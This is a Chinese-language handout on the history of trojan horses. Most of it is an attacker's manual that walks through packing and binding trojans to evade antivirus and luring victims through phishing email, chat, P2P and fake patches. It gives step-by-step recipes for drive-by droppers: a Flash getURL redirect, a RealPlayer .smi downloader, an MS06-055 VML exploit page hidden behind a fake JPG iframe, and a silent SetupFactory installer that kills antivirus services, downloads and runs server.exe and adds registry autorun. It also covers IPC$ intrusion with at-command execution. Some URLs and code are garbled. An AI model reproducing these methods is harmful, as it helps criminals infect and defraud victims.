木马的历史演变及发展(完整版)实用资料

木马的历史演变及发展（完整版）实用资料(可以直接使用，可编辑完整版实用资料，欢迎下载）

木马知识参考详解木马的历史演变及发展（完整版）实用资料(可以直接使用，可编辑完整版实用资料，欢迎下载）—参考《木马任务大作战》编者：韩南南2021信息安全管理木马演变过程—————————————————————————传统EXE程序文件木马传统EXE程序文件木马传统DLL/VxD木马替换挂钩式DLL木马注入式DLL木马使用一般工具制作的木马第一代木马第二代木马第三代木马第四代木马第五代木马图1.木马演变流程图*.exe木马是指在被黑电脑中以*.exe文件运行的木马，同时它也很容易被杀毒软件查杀的木马，可以同任务管理器或TaskInfo之类的工具抓出来，或者是使用网络连接监控软件（如：CurrPorts,TCPView等）发现它的踪迹。*.DLL/VxD木马，为了不在任务管理器，TaskInfo或网络连接软件等之类的软件中显出原形，黑客们便发展出所谓的DLL/VxD木马，由于这类木马本身无法自己运行，因此设置在注册表中利用Windows启动时一并被加载运行，或是使用Rundll32.exe,svchost.exe，来运行它，如此在任务管理器，TaskInfo或网络连接监控软件之类的工具中就未找到它的踪迹（因为只能看到启动该木马程序，例如：Rundll32.exe,svchost.exe等），如此只要不被杀毒软件抓出来就可以安全地藏匿在被黑电脑中默默工作着，不过若被黑着对自己的Windows环境很熟悉，这仍然可以藉由某些工具（例如：系统信息，TaskInfo）查看目前所有已加载的DLL/SYS/VxD文件而发现不速之客的踪迹。此类木马也可以由防火墙的端口监控而找出它的踪迹，也因此有黑客发展出ICMP木马或反弹端口木马来逃过查杀。 替换挂勾式DLL木马参数传递给真正的DLL系统文件（例如：Kernelx.dll）进行应该有的正常动作，如果收到远程木马客户程序（Client）传来的信息，就进行相关的黑客任务，如此不论是系统管理员或对系统很熟悉的用户都很难窥见它的踪迹。注入式DLL木马是指利用注入技术将DLL木马寄生到某个系统文件中（例如：Explorer.exe），当该系统文件运行时木马也一并被运行，如此不仅在任务管理器或TaskInfo之类的工具中不可能发现它，而且在CurrPorts或TCPView之类的网络连接监控工具中也看不到它的踪迹。不过，在WinXPSP2,WinVista或更新版本中加入了数据执行保护（DEP）的功能后，使这类木马成功的概率大幅度降低。一般工具制作的木马，其主要目的是逃过杀毒软件和防火墙的查杀。为了达到这个目的，因此很多黑客发展出利用一般的工具软件（包含Windows系统提供的各种小型工具）制造组合出自己需要的木马。木马伪装技术的演变—————————————————————————最原始的木马（很容易被杀毒软件找出来斩首，也不容易诱骗被黑者运行）最原始的木马（很容易被杀毒软件找出来斩首，也不容易诱骗被黑者运行）合并其他文件的木马（很容易被杀毒软件找出来斩首，但较容易诱骗被黑者运行）对合并其他文件的木马进行压缩重组（短期内较不易被杀毒软件找出来，也容易诱骗被黑者运行）DLL木马只需进行压缩或重组伪装即可（短期内较不易被杀毒软件找出来，植入就可自动运行。）【DLL木马】从远程将DLL木马注入系统线程，植入与运行（潜藏在其文件中运行，几乎很难被杀毒软件找出来，所以不必伪装。）查找更新的伪装工具或重新编译木马原始程序（短期内较不易被杀毒软件找出来，也容易诱骗被黑者运行。）【传统木马】寄生在图片，动画，影片文件中（短期内较不易被杀毒软件找出来，也容易诱骗被黑者运行。）【寄生木马】图2.木马伪装技术演变过程木马伪装测试流程—————————————————————————黑客已选择要使用的木马程序黑客已选择要使用的木马程序使用多种杀毒软件查看是否会抓出来？将木马伪装易容使用多种杀毒软件查看是否会抓出来？是否还有其他方法与工具可伪装？不必伪装，可进行将木马植入被黑电脑可进行将木马植入被黑电脑还是可以将木马植入被黑电脑，但失败概率很高。YESNOONONOYESYES图3.木马伪装测试流程木马伪装方法—————————————————————————（1）压缩伪装法其主要目的是帮助我们将重量级程序文件减肥以便传输，除了可以加快启动速度外也能减少占用磁盘空间，因此当然也能使用在木马上，压缩后会改变它的特征，当然也就有机会躲过杀毒软件的查杀。此类工具并非为木马设计，所以杀毒软件不能将这些工具视为病毒或木马的帮凶。该类软件主要有以下几种：ASPack,PECompact,UPXShell（UPXShell是基于dos命令的软件，里面含有很多参数，通过设置这些参数可以伪装出不同面貌的木马）。(2)重组变形伪装法这类软件主要是将一般软件包装成有时间限制或其他限制的试用版本，并对程序文件进行加密变形，让试用版的限制无法被破解。此类软件用在木马上表现有以下特点：可将程序文件重组变形不是为木马设计通常会提供多种选项，例如CRC加密，反组译能力，删除文件头信息等。利用这些选项的排列组合，可以重组出不同面貌的木马。这样的软件主要有以下3种：EXEStealthProtector，ASProtectSKE和PrivateexeProtector。注：一般而言，黑客并不会将压缩伪装后的木马再拿来进行重组伪装，因为很可能造成木马无法运行的状况。EXEStealthProtector这是一个将指定的程序文件包装成有时间或其他限制的试用版，并尽可能将程序文件重组变形，让它无法破解成正常版本，既然它就是要让破解者都看不懂，杀毒软件当然就更难辨认了，所以黑客使用此工具来对木马易容，会比使用压缩伪装法有更大的机会逃过查杀。另外，在使用该软件变装后，有可能破坏原来木马程序文件中某些内容（概率不高但有可能发生），因此在变形完成后黑客应该都会运行该木马看是否有问题。下载地址：://faqdiy/（3）捆绑伪装法使用其他易容术后，最好再用捆绑伪装法进行第二次伪装，如此不仅可以有机会躲过杀毒软件的查杀，也更能诱骗被黑者运行。使用木马捆绑器的木马，经常因为木马捆绑器被抓出来而失败而不是木马本身被抓到，所以除非是刚出来不久而且知名度不高的木马捆绑器，否则黑客不会轻易使用这类工具。由于杀毒软件大多辨认程序文件的前面部分（也就是启动加载的stub程序）或图标，所以有些工具也可以让选用不同的stub程序或更换图标，最后还可以对合并的文件进行加密与压缩。由于木马捆绑器所制造出来的合并程序在被黑者运行时会将木马程序拆开保存到被黑电脑磁盘中，此时的木马就是完全没有易容的，很容易被杀毒软件查杀。因此，有经验的黑客在使用这个捆绑法之前会先使用其他伪装术（例如：前面的压缩法或重组法）将木马进行第一次伪装，然后再使用此方法进行第二次伪装。特点：1.原木马程序与另一程序文件合并在一起2.可以和一个（或多个）程序文件合并3.可以合并图片，音频文件，影片文件4.决定是否隐藏，设置每次进入Windows就自动运行等功能以下是4种功能较完整的木马捆绑器：DeceptionBinder，FreshBind，MicroJoiner，ExeBinderDeceptionBinder捆绑器主要有两个缺点：1.合并文件在运行时必须都为正常或隐藏，若合并时的正常文件要运行，则必须为normal方式运行。2.此合并文件运行后会将两个文件分开，然后保存在Windows系统所在文件夹或其下的system32文件夹中，此时木马已经和原来正常文件分开了。同时，该软件也有优点：可以选择不同的stub程序文件，木马文件和另一个正常的程序文件。FreshBind捆绑器的优点：1.可以选择不同的stub程序，因此有机会逃过杀毒软件的查杀。2.它也可以针对个别程序运行时设置正常或隐藏。缺点：1.此工具会在注册表中设置每次启动都自动运行木马，很容易被查杀发现。2.此合并文件运行后会将两个文件分开，然后分别保存在需要的位置。MicroJoiner可以自己添加喜欢的图标。缺点：无法选择stub程序，也不会再注册表中设置以后每次启动后都自动运行，所以，必须依靠木马本身来实现这些，而此合并文件运行后会将揭开的文件保存在缓存文件夹中（例如：C:\WINDOWS\TEMP），此时木马文件脱去了第二层皮，显出了原形。ExeBinder捆绑器，无法选择stub程序，可以选择个别程序运行是正常或隐藏，也就是将木马隐藏运行，另一个文件则正常运行。但是此工具在注册表中设置每次启动都自动运行木马，很容易发现，可以通过startup来查看。同时，此合并文件运行后会将两个文件分开，然后保存在不同的位置。黑客捆绑器伪装的测试软件Avast!Home杀毒软件，NortonAntiVirus杀毒软件，瑞星杀毒软件，卡巴斯基杀毒软件，通过实验研究得出：1.几乎所有的木马捆绑器都会被杀毒软件抓出来，不过杀毒软件抓的是木马捆绑器而不是木马本身，因为木马捆绑器本来就是用来包装木马的。2.压缩易容法简单方便，但是被杀毒软件抓出来的概率也不算低。3.在测试中发现，使用变形重组工具易容的木马比较不容易被发现，因为它可以重组出多中面貌的木马。木马植入与运行流程—————————————————————————伪装伪装好的木马程序（包括不需要伪装的木马）是否可进入被黑电脑？电子邮件夹带木马，木马帮凶，下载地址或地址寄给被黑者，是否可进行黑客任务？实时通讯软件或聊天室中将木马或木马帮凶传给被黑者，或诱骗下载木马或木马帮凶，到木马网页，是否可以进行黑客任务？在网站，博客，讨论区或p2p共享区中公布木马下载地址，木马帮凶下载地址，木马网页下载地址...，愿者上钩，是否可进行黑客任务？另找其他路径来达到目的NONONONO直接入侵图4.木马植入与运行流程木马植入常用方法—————————————————————————直接入侵被黑电脑当然就是黑客进入被黑电脑中，将木马复制（或上传）进去来达到植入的目的，但是这种方法是不容易的。黑客基本上常用的直接入侵方法有3种：端口139入侵，漏洞入侵和直接复制。若黑客以这种方法成功入侵被黑电脑，对于有些木马还需要在植入被黑电脑后，进行相关设置，使用此方法成功后黑客都能自己进行设置，而不必另想其他办法实现。（例如：若使用电子邮件植入的木马就可能需要另寻其他方法进行设置），同时，若黑客在被黑电脑中具有最高权限，还可以在植入后立刻在被电脑中运行木马，设置每次进入Windows就知道运行等许多工作。问题:1.如何让被黑电脑重新启动？2.何时进行黑客任务行动？电子邮件夹带木马【优点】：1.邮件钓鱼就是指大量发送夹带木马，木马帮凶或地址的信件，只要有一个人上当而运行它就可能成功，所以乱枪打鸟的发放来任意查找被黑者。2.邮件中夹带木马帮凶（通常是多媒体文件）寄给熟悉的被黑者，当打开该文件时趁机植入与运行木马，由于都是在后台运行，所以成功的概率比较高。【缺点】：1.使用电子邮件来传播木马，一定会先放在被黑者信箱所在的收信服务器中（如POP3服务器），而现在许多收信服务器中都安装了杀毒软件，因此，信件中夹带的木马会有可能被查杀。【雅虎】信件服务器【雅虎】信件服务器（杀毒软件）【网易】信件服务器（杀毒软件）【被黑者】主机【黑客】主机（1）（2）（3）（4）（5）（6）图5.邮件发送和接受流程注释：（1）黑客主机通过邮件软件来向【网易】信件服务器发送电子邮件的请求，（2）之后；黑客主机【网易】信件服务器发送邮件目的地址（如：被黑主机@,com）和内容。（2）【网易】信件服务器向【黑客】主机回应请求响应。（3）【网易】信件服务器向【雅虎】信件服务器发送电子邮件接收请求，（4）之后；【网易】信件服务器向【雅虎】信件服务器发送电子邮件。（4）【网易】信件服务器发送电子邮件接收请求回应。（5）【雅虎】信件服务器向【被黑者】主机发送收到电子邮件通知，告诉主机去查看电子邮件内容。（6）【被黑者】主机向【雅虎】信件服务器回应请求。2.信件中的木马也可能被被黑电脑中的杀毒软件查杀。3.一般上网用户的安全警惕性现在比较高，因此许多人收到信件中夹带*.exe程序文件都不会运行。4.邮件中若是仅夹带木马下载地址或木马网页地址，则成功率比较低。5.有些木马（DLL木马）无法自己运行，必须编个理由让被黑者相信后依照黑客信中的指示来设置后才能作用，因此，这类入侵的成功率比较低。诱骗特定[任何]对象编造各种理由（系统修补文件，好玩的游戏，爆笑的影片或动画，方便好用的工具，破解文件等）来诱骗熟悉的被黑者下载木马，下载木马帮凶或进入木马网页，这是网络中常使用的方法。因此实时通信软件（如MSN，雅虎实时通，SKYPE，QQ等），聊天室，网页，p2p共享区，讨论区，博客，短信都成了最佳的媒介管道。【缺点】：1.若被黑者的网络安全意识很强，拒绝从网络上下载任何文件，如此当然就无法成功。2.这种方法只能对付粗心大意的网络者，对颇有经验的就不行了。木马帮凶与木马网页将木马程序邮寄给被黑者或是诱骗被黑者下载木马，不论是直接下载或到某个网页中下载。【木马帮凶】—由于许多人都会拒绝下载或运行任何*.exe文件，因此，黑客就给被黑者有兴趣的文件（影片，动画，音乐，游戏等）。如此被黑者打开这个文件就可以自动植入与运行木马，或是要求下载木马，或自动进入木马网页来达到目标。【木马网页】—不是诱骗到某个网页后由被黑者自行下载木马，而是被黑者只要浏览网页木马就会自动植入被黑者电脑而且运行。这是被黑电脑中莫名其妙地多出来许多间谍程序，恶意源码，僵尸程序和木马的原因。【优点】：只要打开木马帮凶或浏览木马网页就会自动植入与运行木马，成功率比较高。【缺点】：1.这类方法大多要利用漏洞或要写VBScript，JavaScript或PHP程序，此等技术门槛较高。2.利用浏览器或系统（比如Windows）的漏洞来植入与运行木马，如果被黑电脑并不是使用该浏览器或系统，或是其他没有该漏洞的版本，或是以修补该漏洞，此方法就失败。3.若木马是使用VBScript或JavaScript设计的，而被黑者使用的浏览器未支持（或关闭此功能），则这种方法就会失败。4.以此方法植入被黑者电脑中的木马不能太大，否则木马下载的时间太久会引起被黑者的怀疑。其他方法端口139入侵，漏洞入侵，骗取各种密码，拒绝服务攻击和SQL注入攻击等。—————————————————————————直接入侵—————————————————————————直接入侵成功后，可以做的工作：1.将木马复制到被黑电脑中（在被黑电脑中的身份具有写入权限）2.可对木马进行相关设置（如果该木马需要的话）3.设置被黑电脑每次启动进入Windows就自动运行木马（如果该木马无法做这项设置）4.在被黑电脑中立刻运行植入的木马（在被黑电脑中的身份须具有最高权限才行），若成功就能立刻进行相关黑客任务。5.同时，还可以进行许多与木马无关的黑客工作，例如偷取或删除数据文件，邮件文件，更改或删除注册表值等。DLL木马比较直接适用直接入侵法，因为它不是一个程序文件，必须进行相关设置后才能运作，而其他方法都很难实现这种设置。端口139入侵—————————————————————————端口139入侵是最常见而且最简单的入侵方法，只要被黑电脑有打开端口139而且有设置磁盘共享，猜出或破解密码（有些根本没有密码）就可轻易进入，而对于win2k电脑还可利用默认共享漏洞（IPC$）通过端口139来进入，而且通常使用此方法进入被黑电脑时都具有最高权限。只要入侵成功，就可以植入木马（以文件方式复制到被黑电脑中即可）与运行木马（可利用at命令）预防方法：若不需要他人电脑与你的电脑通过internet连接，则可以完全关闭端口139与磁盘共享。若需要与他人电脑进行internet连接，则最好关闭磁盘共享；若必须要有磁盘共享，则一定要设置复杂的用户名和密码。Win9x与winME电脑必须修补磁盘共享密码漏洞，而win2k电脑则必须删除默认共享漏洞。漏洞入侵—————————————————————————漏洞，英文简称“Exploits”；其主要包括Windows系统漏洞和IIS漏洞，这两个漏洞成为了全球黑客的头号下手目标。漏洞入侵有以下特性：1.大多数漏洞通常伴随某个系统（或某个软件）的某个(或某些)版本，并非任何情况下都可以使用。2.Windows系统或各种软件的漏洞有千百种，但能用于入侵而且成功，甚至具有最高权限的漏洞仍属少数。3.找到适合的入侵漏洞，但是黑客还要有适当的工具可用。许多Windows系统程序和IIS系统都有远程缓冲区溢出漏洞，如果成功入侵，在许多情况下黑客是具有最高权限的。有些黑客针对某些漏洞设计了蠕虫式病毒，它会主动在网上扫描是否有符合该漏洞的电脑，若有就利用该漏洞入侵并趁机植入木马或病毒，此方法也是利用漏洞入侵的。注：若远程缓冲区溢出漏洞入侵成功后，黑客要将木马传入被黑电脑中也不容易；他需要使用vtftpd32这个小工具将自己的电脑变成一个简易的FTP服务器（或将木马先放到某个FTP服务器中），然后利用被黑电脑中Windows系统提供的ftp下载工具，将木马从FTP服务器下载（复制）到被黑电脑中，然后利用at命令来运作木马就可以了。防护方法：就是经常到微软网站查看是否有新的漏洞，若有就下载补丁程序。直接复制—————————————————————————直接复制就是黑客使用被黑者的电脑，这类黑客通常就是你身边的人，比如亲友，同事，同学，朋友等，在你没注意时使用你的电脑，趁机将木马复制进去并进行相关的设置。防护方法：对自己的电脑进行设置复杂的密码和屏幕保护密码。—————————————————————————诱骗下载与运行木马—————————————————————————近50%的木马都是使用电子邮件来达到植入与运行的目的，其中最主要的方法是欺骗法（钓鱼法）和邮件程序漏洞法。欺骗法（钓鱼法，Phishing）—————————————————————————这是利用电子邮件夹带木马，木马帮凶或诱骗被黑者下载木马，进入木马网页的相当常用的方法。1.口头诱骗法口头诱骗法主要是黑客编个让被黑者相信的理由，来接机植入木马。收件人：收件人：主题：附件：编写一个被黑者相信的理由，让他接受附件。附件中夹带木马，通常已更名而且有伪装，寄出前再压缩，或夹带木马帮凶。图6.钓鱼法（1）收件人：收件人：主题：超搞笑的搞笑视频片段://××××××编一个对方感兴趣的理由！附上包含木马的影片地址或可下载该木马的影片地址图7.钓鱼法（2）通过电子邮件可以夹带JavaScript或ActiveX恶意代码（如：窗口炸弹等）。防护方法：（1）有些信件服务器里装有杀毒软件可以帮助被黑者躲过一劫。（2）不要太轻信别人的话，一致于使自己的电脑中毒。2.视觉欺骗法在Windows系统中，用户可以不显示已知文件的附文件名来查看各文件，由于Windows默认是不显示的，而许多用户也没有更改它，因此就让许多黑客有了可乘之机。黑客可以将木马名称加一个假的附文件名。Server.exeServer.exe【1】S【2】重命名后【1】中的server是主文件名，exe是扩展名；【2】中将.jpg视为主文件名的一部分，server.jpg是主文件名，而exe仍然是扩展名。因此黑客将这个改好文件名的木马夹带在邮件中，然后发送给被黑者，若在被黑者Windows中有设置此项目[]隐藏已知文件类型的扩展名打勾，则收到此文件后就会误以为是.jpg图片文件（或其他类型的文件）而打开它，却是运行木马程序。防护方法：1.有些信件服务器会进行杀毒工作的。2.打开“文件夹选项”-[]隐藏已知文件类型的扩展名（此项目不打勾）3.邮件程序漏洞法邮件程序主要有：WindowsMail，OutlookExpress，Outlook等。当被黑者收到信件后一查看就会自动运行附加中的木马，如此不管被黑者是否上当，木马都已经运行了。注：Windows系统，IE和IIS的漏洞比较多，所以许多黑客将重心转移到IE浏览器和多媒体文件的漏洞上来，而邮件则成为诱骗被黑者到有木马网页的媒介，一旦被黑者进入该网页，就会利用IE浏览器的漏洞趁机植入与运行木马。（若不使用IE浏览器就无效了）4.实时通信软件/聊天室/短信/骗取法投其所好例如被黑者喜欢的图片，影片，游戏，动画等。有所需求例如需要某种或某类软件，Windows有问题需要解决，需要某个破解工具或Crack文件。漏洞修复例如Windows系统，IE，WindowsMail，OE等有严重的漏洞，需要某个文件来修补等。黑客假装含有这样的文件，传给被黑者就可。5.网页骗取法在网页中提供一般人有兴趣的图片，影片，动画和游戏等，只要点击后就会下载木马。在网页中提供Windows或IE的严重漏洞补丁程序，知名软件最新破解工具或Crack文件，单击也会下载木马程序。在网页中提供免费软件，共享软件，多媒体播放与注册破解程序等，点击下载木马程序。6.P2P共享区骗取法7.讨论区与博客（Blog）骗取法该方法的作用是只要依照论坛区中的主体或博客文章中相关内容来找借口，然后提供木马的下载地址或木马网页地址就可以等着被黑者上钩了。—————————————————————————动画或游戏木马帮凶（Flash木马帮凶）—————————————————————————黑客为了使木马能够在被黑者电脑中保存并且运行，因此黑客就在多媒体文件上动力脑筋，如：动画，影片或好玩的游戏。虽然各种动画与游戏有许多种格式，而黑客还是选择最常见，最普及的Flash动画及游戏（影片）作为下手的目标。只要是Flash制作出来的任何.swf文件都可以拿来修改成木马帮凶。制作流程：1.选择被黑者有兴趣的动画，影片或游戏，但文件最好不要太大，小于2MB是最合适的。2.准备工具使用闪客精灵将选择好的SWF文件反编译成fla文件（也就是flash的源文件），然后使用flash软件对这个fla文件进行编辑，将木马下载地址或木马网页地址加入后再保存为SWF文件就可以了。3.（1）打开闪客精灵后，再单击该SWF所在文件夹并选中该文件。（2）单击导出fla按钮并且对导出fla全部选项都打勾。然后在导出fla向导中，将fla保存在电脑中。4.打开flash程序并加入fla文件，展开“动作-帧”模块，在其右侧空白区呢输入“getURL（”://××××”,”_blank”,”GET”）;”然后对fla文件进行保存，并且将新生成的fla文件导出成”影片“就可以了。当播放这个SWF文件时就会自动打开浏览器并进入木马下载地址或木马网页地址。5.给被黑者将加工完成的SWF文件邮寄给被黑者，放在网页上让被黑者下载，放在p2p共享区中让被黑者下载，使用实时通讯软件传给被黑者等方法来进行。当被黑者打开（播放）时，就会自动出现要求下载木马或进入木马网页，如果进入下载木马页面，为了不让被黑者怀疑，黑客会将木马程序的文件名称改为与诱骗多媒体文件名有关联的名字，比如诱惑多媒体文件是色情内容，则木马名称可改为sex.exe,hardcore.exe,blowjob.exe等名称，比较能舒服被黑者下载。【优点】这类文件只是引导被黑者下载木马或进入木马网页，并没木马藏匿在其中，所以只能说是木马的帮凶，由于是单纯的多媒体文件，可以躲过杀毒软件的查杀。—————————————————————————多媒体木马帮凶(帮助文件木马的制作)—————————————————————————首先，我们不得不承认设计出一个多媒体木马帮凶是很困难的。同时，针对多媒体的木马帮凶生成器只是针对串流多媒体.smi格式文件（一般使用RealPlayer播放）。RealPlayer木马帮凶操作流程：1.下载木马帮凶生成器下载地址为iy/2.生成木马帮凶生成木马帮凶之前，黑客必须先将要植入被黑电脑的木马传到某个网页空间上，然后记下该木马文件的完整下载地址。在生成器软件地址栏中输入要加载的木马地址，并且，实现方式选择Embed标签，这样可以生成木马网页，自动植入木马。3.加工处理RealPlayer播放它就会自动下载木马与运行之，因此黑客会将它重命名为被黑者有兴趣的名称。如果不是将cutedog.smi邮寄或发送给被黑者，那么：（1）若要被黑者从网络上下载cutedog.smi，黑客就要先将cutedog.smi上传到网页空间，记下完整下载地址。（2）若要被黑者进入木马网页，则cutedog.htm，cutedog.smi等所有与这个网页相关的文件都要上传到网页空间，然后记下打开cutedog.htm的完整地址。4.给被黑者将cutedog.smi邮寄给被黑者将cutedog.smi经由实时通信软件传给被黑者将打开cutedog.htm的完整地址告诉或发短信给被黑者或者公布在其他网站，博客，讨论区，聊天室中。然后等待木马顺利植入某个被黑电脑与运行成功后，就可进行黑客任务。5.被黑电脑情况当被黑者要播放cutedog.smi时便会打开RealPlayer播放器（若是木马网页则是进入该网页就会自动播放它，若设计多个播放器则要被黑者点击才会播放），但事实上是将下载木马到被黑电脑的Windows所在目录下的system32文件夹中，文件名为a.exe，下载完成后就会自动运行它。不过并不会设置每次进入Windows就自动运行，所以这件工作还必须靠木马自己来实现（如:Sub7,OptixPRO的服务器程序都可以实现），若木马本身无法实现每次进入Windows就自动运行，那么就算成功植入被黑电脑与运行，只要被黑电脑重启的就没什么作用了。如果被黑者并没有连接到internet，则播放器（或显示该木马网页的浏览窗口）就会自动退出，就像什么都没有发生过一样。当然并不限于RealPlayer帮凶，WindowsMediaPlayer也可能会有。防护方法：1.不要随意进入不清楚的网页，或播放来源未知的多媒体文件。2.如果播放某个多媒体文件后（包括网页中），没有正常播放出来，甚至没反应，就要怀疑可能中木马，先切断与internet的连接，然后更新病毒库后查看Windows系统所在的磁盘是否有木马存在。—————————————————————————自动植入与运行木马（木马帮凶生成器）—————————————————————————黑客都希望能在被黑者不怀疑，杀毒软件抓不到的情况下，顺利将木马保存到被黑者电脑中然后运行它。因此，黑客会先针对某个漏洞（通常是Windows或IE的漏洞）设计出一个特殊的网页，但被黑者浏览这个网页时，就会利用该漏洞无声无息地趁机将木马下载到被黑者电脑中运行它。帮助真正的木马植入被黑电脑中被运行之，这样的工具称为木马帮凶生成器，而不是木马生成器，Sub7editserver.exe或OptixPROBuilder.exe才算是名符其实的木马生成器。木马生成器主要是用来生成真正的木马。【获取网页空间】黑客要利用木马网页来诱骗被黑者浏览，当然就需要一个网页空间来摆放木马网页文件与该网页所需要的相关文件。行动之前，黑客必须先将要植入被黑电脑中的木马上传到某个网页空间（不一定要与木马网页文件放在同一个网页空间），然后记下该木马的完整地址。下面的几个木马帮凶生成器都是利用微软公布的漏洞而设计的，对win2kSP4，WinXP，Win2003各版本都可以成功，不过对WinVista则无效（因为漏洞都已经修补）。1.MS06-055木马帮凶生成器这是利用微软编号MS06-055漏洞所设计的木马帮凶生成器，由于它是利用VectorMarkupLanguage漏洞而设计的，所以也称为IE_VML木马黑客帮凶生成器。黑客先从网络上获取它，解开后的文件全部放在同一个文件夹中。步骤：1.创建漏洞程序吗使用记事本打开make.bat，并设置黑客自己的木马下载地址。Echo”MSInternetExplorer(VML)DownloadAndExecShellcodeCreate”Echo”Welcometohere”Echo”DownloadExecShellcodebynop”Ehco”ChangedByXXX”Shellcode.exe>shellcode.txt关闭杀毒软件，然后运行make.bat，因为是批处理文件，所以出现DOS窗口闪一下就消失了，同时就会创建一个shellcode.txt。——————————ShellCode————————————%%%4325%%%%76374&&……××……%435%……@%￥@……&@&@××××……@……#453625%。【将这一长串看似乱码的程序码选定后，关闭记事本】再打开记事本打开IE_VML.htm，将前面复制的程序贴进来。VarpayLoadCode=unescape(“%%%4325%%%%76374&&……××……%435%……@%￥@……&@&@××××……@……#453625%。”);//InsertShellCode完成后保存，这个IE_VML.htm就是木马网页。3.完美诱骗先找一个被黑者有兴趣的图片（例如：可爱小狗图片，文件名cutedog.jpg），然后将此图片与木马网页文件（IE_VML.htm）都上传到网页空间，记下这两个文件的完整地址，前面下载木马帮凶生成器解开后有一个CutePuppy.jpg，它不是一个真正的JPEG图片，使用记事本打开它，然后输入图片与木马网页文件的完整地址。CutePuppy.jpg–记事本<imgsrc=><iframesrc=””height=”0”frameborder=”0现在再将这个假的图片CutePuppy.jpg重名为与那个图片（此范例中是cutedog.jpg）相关的名称。4.上传与行动现在将这个假的图片文件上传到网页空间（最好与真的图片与木马网页文件在同一个空间），然后记下指向这个假图片的完整地址，现在黑客将可以将这个假图片地址传给被黑者了。若一切顺利，木马网页会将真正的木马下载保存到被黑电脑Windows系统所在文件夹下的system32子文件夹中，文件名为a.exe，然后运行。2.MS06-014木马网页这是利用微软编号MS06-014漏洞所设计的木马网页，它并不是溢出漏洞，所以没有像乱码那般的程序码，使用一般VBScript或JavaScript就能写出来，所以不必使用木马帮凶生成器。3.MS05-001木马帮凶生成器黑客可以使用这个木马帮凶生成器来制作木马网页，断开与internet连接。（1）选择木马程序（2）输入木马网页所在的地址（最后要有/），不包含木马网页文件名然后将这3个文件上传到网页空间就可以诱骗被黑者来浏览此网页。若一切顺利，则木马网页会将真正的木马下载保存到被黑电脑c：\，文件名为arcldrer.exe，然后运行它。注：所有木马帮凶生成器都会将木马下载到被黑电脑中保存后并运行之，但大多数却不会设置每次进入Windows就自动运行，因此这件工作还必须靠木马自己来实现（例如Sub7或OptixPRO的server都可以实现），若木马本身无法实现（许多小木马都不行，除非木马是黑客自己下的），那么就算成功植入被黑电脑与运行，只要被黑电脑重启就不行了。—————————————————————————诱骗下载与运行木马—————————————————————————安装生成工具（SetupFactory）设计出来的木马帮凶（或简易木马或病毒）如同一般安装程序那样，程序码本身并没有什么特征让杀毒软件判断，也就是说所有杀毒软件不能将这样的程序当成木马帮凶或病毒。安装生成工具可以设置每次进入Windows就自动运行。木马帮凶制作流程1.无安装画面的运行任何安装软件都会有一个安装画面，使用安装生成工具来设计的当然也不例外，但是木马的帮凶并不需要安装画面，所以黑客可以设置为安静无任何画面地运行。GeneralDesign—[]Runsetupinsilentmode2.播放影片，动画，游戏或音乐一些被黑者喜欢的影片，动画，游戏，音乐，各种漏洞补丁程序，试用版软件破解程序，小工具等，最好不要超过5MB大小。然后记下该多媒体文件的完整地址（也就是网络下载地址），如果黑客自己已经有了这样的多媒体文件，那么就要将它上传到某个网络空间上，然后记下指向该文件的完整地址。接着第一步的操作，选择Actions—[双击]OpenDocument；在Filetoopen框中输入黑客自己影片，动画，音乐的地址。3.关闭防火墙与杀毒软件利用Windows系统自己的TackKill.exe来关闭正在运行的程序，还有使用sc.exe关闭正在运行的服务。若要关闭系统防火墙或常用的杀毒软件，黑客就必须要先找出这些文件名与服务名称。如：卡巴斯基杀毒软件的程序文件名是avp.exekavsvc.exe，服务名称是AVPkavsvc。确定要关闭的防火墙与杀毒软件后，黑客就会把它们设计在木马帮凶程序中，可以利用sc.exe,net.exe,taskkill.exe来做这些事。4.下载与保存木马黑客当然要先将木马上传到某个网络空间，然后记下指向该文件按的完整地址。黑客通常会先对木马进行伪装易容，否则一下载到被黑电脑中很可能就被杀毒软件抓出来的。如果木马只是一两项简单的功能，例如：打开被黑电脑的Telnet或终端机服务后门，则可以直接设计在帮凶工具中，也就是说帮凶工具自己升级当木马，而不必再使用其他木马程序。在Actions的startup栏中双击Download，然后再URL中输入黑客自己木马的下载地址。当然也可以直接将木马程序包装在木马帮凶程序中（这本来就是安装生成工具的基本功能），不过这会让杀毒软件更有机会辨认出来。5.运行木马当木马下载到被黑电脑中之后，再来就是无声无息地运行它。双击Download下方的Execute进入ExecuteFile窗口将阴影处改为黑客自己的木马文件名。%SysDir%\server.exe6.设置自动运行如果黑客所使用的木马自己会做这件事，那么就不一定要进行这项设置，否则就会设置每次进入Windows都自动运行（通常是设置在注册表中），设置如下：在Actions的Startup中双击ModifyRegistry进入设置窗口，在Valuedata的选项中%SysDir%\server.exe，将阴影扶风设置成木马文件名。同时，SetupFactory也能设置以服务方式来自动运行（如此更不容易会被发现）。7.生成木马帮凶现在这个木马帮凶已经能够设计好了，可以创建exe程序文件。在project中选中settings来进行最后的设置。在projectSettings的setupfilename中设置木马帮凶程序的文件名称，通常会取与诱骗被黑者的文件相关的名称。在project中点击build就完成了。如果黑客希望程序的图标更加好看，可以下载图标相关的工具来更改图标。id=1098.开始动手这个木马帮凶程序完成后，黑客就可以通过各种渠道来寄给被黑者，或等待被黑者下载，等待木马在被黑者电脑中运行成功后，就可以进行黑客任务了。如果以服务的方式来运行木马就不容易被发现，因为系统服务文件与一般的exe文件不同，因此若要将一般exe文件以系统服务的方式运行，则必须靠特殊工具来完成。为了关闭所有的防火墙或杀毒软件，黑客会将要关闭的文件名称与服务上传到某个网络空间，当木马帮凶运行时先下载该ini文件到被黑电脑中，然后读取该ini文件的名称来逐个关闭，直到所有名称都读取完才停止（以条件式回圈设计，SetupFactory可以做到）。—————————————————————————运行木马—————————————————————————1.被黑者自己运行2.木马网页或木马帮凶运行利用诱骗文件，木马网页或木马帮凶工具来不知不觉地运行木马。3.使用at命令若黑客经由端口139直接入侵到被黑电脑中，而且具有最高权限，被黑者电脑又是使用WinVista，WinXP或Win2k，则可以利用远程运行命令at来运作已经在被黑者电脑中的木马。若黑客是利用远程漏洞直接入侵就等于直接操作被黑者电脑一样（终端机登录操作），因此可以直接运行木马程序，不必使用at远程命令。At命令：c：\>nettime由于对方电脑时间不一定与你的相同，所以输入nettime\\被黑电脑IP，查看时间。C:\>at20:34?????设置该电脑20：34运行？？？？？木马程序。若出现新加了一项作业，表示成功。？？？？？是要运行的程序名，若在Windows系统文件中就输入名称即可，否则要输入所在磁盘与详细路径。例如：Windows或系统文件夹中的system32下，则直接输入该程序名即可。若在其他文件夹中就必须指明所在磁盘与详细路径才行，例如要运行e